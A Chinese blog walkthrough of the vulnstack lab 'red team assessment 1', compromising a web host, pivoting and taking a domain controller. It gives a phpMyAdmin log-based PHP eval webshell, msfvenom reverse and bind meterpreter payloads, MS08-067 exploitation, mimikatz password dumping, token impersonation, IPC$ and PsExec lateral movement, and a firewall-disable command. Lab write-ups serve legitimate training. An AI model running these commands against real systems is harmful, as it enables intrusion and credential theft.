WEB

WEB安全

漏洞复现

CTF

常用工具

实战

代码审计

后渗透

内网渗透

免杀

进程注入

权限提升

漏洞复现

靶机

vulnstack

vulnhub

Root-Me

编程语言

java

逆向

PE

逆向学习

HEVD

其它

关于博客

面试

杂谈

红队评估一

0x01 环境配置

windows7配置成NAT

windows2003添加一个网络适配器一个设置成NAT,另外一个设置为仅主机

windows2008配置成仅主机并修改IP地址

0x02 getshell

访问192.168.52.143是一个phpStudy探针

扫一下网站路径

扫到一个phpmyadmin,访问之后发现可以弱口令登录root/root

接下来可以参考phpmyadmin getshell,通过日志getshell

1
2
3
set global general_log = "ON";
set global general_log_file='C:/phpStudy/WWW/shell.php';
select '<?php eval($_POST["pass"]); ?>'

绝对路径可以在探针里获得,接下来访问192.168.52.143/shell.php

已经成功getshell

0x03 提权

查看之后发现已经是Administrator,已经是比较高的权限了

现在去msf生成一个木马

1
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<ip> LPORT=<port> -f exe > shell.exe

监听端口

1
2
3
4
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.52.128
set lport 60001

在蚁剑中执行shell.exe,可以看到成功反弹shell,接下来可以通过getsystem直接提升到system权限

0x04 内网渗透

首先需要知道内网存活的主机,通过ipconfig可以知道这台主机在192.168.52.1/24这个网段

1
run autoroute -s 192.168.52.1/24

添加一条路由

通过bg退出这个session,选择一个探测主机的脚本,这里我选择arp_scanner,当然别的也可以选择

1
2
3
4
use post/windows/gather/arp_scanner
set rhosts 192.168.52.1/24
set session 1
exploit

其中128是kali的地址,141是下一个需要渗透的主机的地址,143是windows7的地址,别的是一些内网其他主机的地址和本次实验无关

根据描述这里需要用到MS08_067,这里需要使用正向shell

1
2
3
use exploit/windows/smb/ms08_067_netapi
set payload windows/meterpreter/bind_tcp
set rhosts 192.168.52.141

可以看到直接是system了

通过ipconfig查看可以发现这台服务器有两张网卡出了192.168.52.141还有192.168.227.129,那就再添加一条路由然后扫描内网存活主机

1
2
3
4
5
6
run autoroute -s 192.168.227.1/24
bg
use post/windows/gather/arp_scanner
set rhosts 192.168.227.1/24
set session2
exploit

可以看到129是2003的地址,130是域控的地址,另外一个是网关地址

那么下一步是攻击域控

方法有很多,这次我准备用IPC$getshell

首先需要知道服务器的密码

这里使用msf自带的mimikatz去抓windows7的密码

1
2
load mimikatz
wdigest

可以直接看到明文密码[email protected]

使用IPC$首先要切换用户,不然会报错

1
2
3
use incognito
list_tokens -u
impersonate_token GOD\\administrator

可以看到已经切换用户了

1
2
net use \\192.168.227.130\IPC$ [email protected] /user:administrator
dir \\192.168.227.130\C$

可以读取C盘下的文件

新建一个32位的木马,这里要正向

1
msfvenom -p windows/meterpreter/bind_tcp LHOST=<ip> LPORT=<port> -f exe > shell32.exe

现在将木马发送到windows2003上,通过IPC$将木马传输到windows2008

1
2
3
copy shell32.exe \\192.168.227.130\C$\
net time \\192.168.227.130
at \\192.168.227.130 10:53 c:\shell32.exe

首先将木马复制到130的C盘下,然后查看这台服务器的时间,最后设置定时启动

但是这里不能直接反弹回来,因为有防火墙,所以要先将防火墙关闭

这里使用PsExec.exe执行命令

将这个文件上传到windows7上并执行

1
PsExec.exe \\192.168.227.130 -u administrator -p [email protected] cmd

不管是msf还是nc反弹回来的shell虽然是交互式的但好像和原生的还是不一样,可以执行这条命令但是连接不上,如果直接在windows7上执行是可以连接上的,所以想别的方法,现在想到的是通过msf的远程桌面连接windows7然后再执行命令

1
run getgui -e #开启远程桌面

然后开启另外一个shell输入

1
rdesktop 192.168.52.143:3389

接下来输入用户名和密码登录

1
2
GOD\administrator
[email protected]

已经登录成功了

接下来再次输入上面PsExec.exe的命令去连接windows2008

可以看到已经成功连接上了,关闭防火墙

1
netsh advfirewall set allprofiles state off

重复上面的方法,监听端口执行木马

成功返回了shell,因为是高权限可以最直接通过getsystem提权

0x05 总结

看了一下别的师傅做的都是msf和cs一起使用,cs有拓扑图,会比较清晰一点,下次也试着用一下

前面两台主机还好,最后的域控是花了不少时间,虽然永恒之蓝可以直接攻击,但是还是想尝试一下别的方法